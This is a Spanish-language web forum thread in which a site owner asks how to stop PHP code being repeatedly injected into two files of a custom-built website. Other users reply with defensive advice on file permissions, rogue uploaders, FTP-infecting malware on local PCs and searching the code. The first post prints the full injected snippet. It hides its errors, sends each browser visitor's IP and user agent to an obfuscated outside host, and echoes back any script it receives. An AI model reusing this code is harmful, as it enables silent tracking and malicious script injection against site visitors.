Virus en archivos php

leobh Seguir

Gamma
Verificación en dos pasos desactivada
Verificado por Whatsapp
Desde
29 Mar 2011
Mensajes
329
Hola que tal, a ver si alguien nos puede ayudar.
Desde hace unos días, nos están inyectado código en 2 archivos de nuestra web, por más que cambiamos los passwords de la base de datos o ftp siguen modificando nuestros archivos, no si alguien nos podría echar una mano.
El código que inyecta es el siguiente
<?php
#4c472f#
error_reporting(0); ini_set('display_errors',0); $wp_rmap1999 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_rmap1999) && !preg_match ('/bot/i', $wp_rmap1999))){
$wp_rmap091999="http://"."template"."align".".com/align"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_rmap1999);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_rmap091999);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_1999rmap = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_1999rmap,1,3) === 'scr' ){ echo $wp_1999rmap; }
#/4c472f#
?>

Un saludo
 

vicram10

Épsilon
Programador
Verificación en dos pasos activada
Verificado por Whatsapp
¡Ha verificado su Paypal!
Desde
8 May 2013
Mensajes
751
Edad
38
verifica si tu archivo no tiene permisos de escritura, debes dejarle con permisos 644 y rastrear en tu sitio web si es que no hay algun archivo extraño que se haya subido por X persona (ya habia encontrado ese tipo de casos donde el que regalaba el theme, tenia un uploader en una parte ajena al sistema)
 

leobh

Gamma
Verificación en dos pasos desactivada
Verificado por Whatsapp
Desde
29 Mar 2011
Mensajes
329
Buenas! Gracias por la ayuda, si la verdad que esos archivos ya los tenemos con permisos 644, y hemos subido los originales de una backup limpia que teníamos de principios de año, pero nada.
No es un theme de wordpress, es una programación hecha a medida.
Un saludo!
 

vicram10

Épsilon
Programador
Verificación en dos pasos activada
Verificado por Whatsapp
¡Ha verificado su Paypal!
Desde
8 May 2013
Mensajes
751
Edad
38
revisa si no tienes un virus en tu computadora o algo asi.. una ves le paso lo mismo a mi hermano con su web, al entrar al filezilla o cualquier ftp le infectaba los archivos.
 

leobh

Gamma
Verificación en dos pasos desactivada
Verificado por Whatsapp
Desde
29 Mar 2011
Mensajes
329
Si justo estábamos escaneando todos los ordenadores ... a ver
Y el código te dice algo de lo que puede ejecutar?
Saludos!
 

jtsamper

Beta
Programador
Verificación en dos pasos desactivada
¡Usuario con pocos negocios! ¡Utiliza siempre saldo de Forobeta!
Desde
26 Dic 2013
Mensajes
60
Yo buscaria, eval o similares en tu codigo.

Como descargatelo, en el pc, crea un proyecto en netbeans con esos archivos y busca en todo el proyecto fragmentos del codigo que has enviado.

De esta forma podras saber si ha sido inyectado o si ha sido subido y por quien...


Espero que te ayude.
 

leobh

Gamma
Verificación en dos pasos desactivada
Verificado por Whatsapp
Desde
29 Mar 2011
Mensajes
329
Muchas gracias! voy a instalarlo y ver, hemos estado viendo y entre los últimos archivos modificados los únicos que no habían sido tocados por nosotros eran los 2 infectados.
A ver que nos da de resultado con netbeans
 

¡Regístrate y comienza a ganar!

Beneficios

  • Gana dinero por participar
  • Gana dinero por recomendarnos
  • Descubre ofertas de empleo diariamente
  • Negocios seguros
  • ¡Información premium y más!

Acceder

¿Ya tienes una cuenta? Accede aquí

Arriba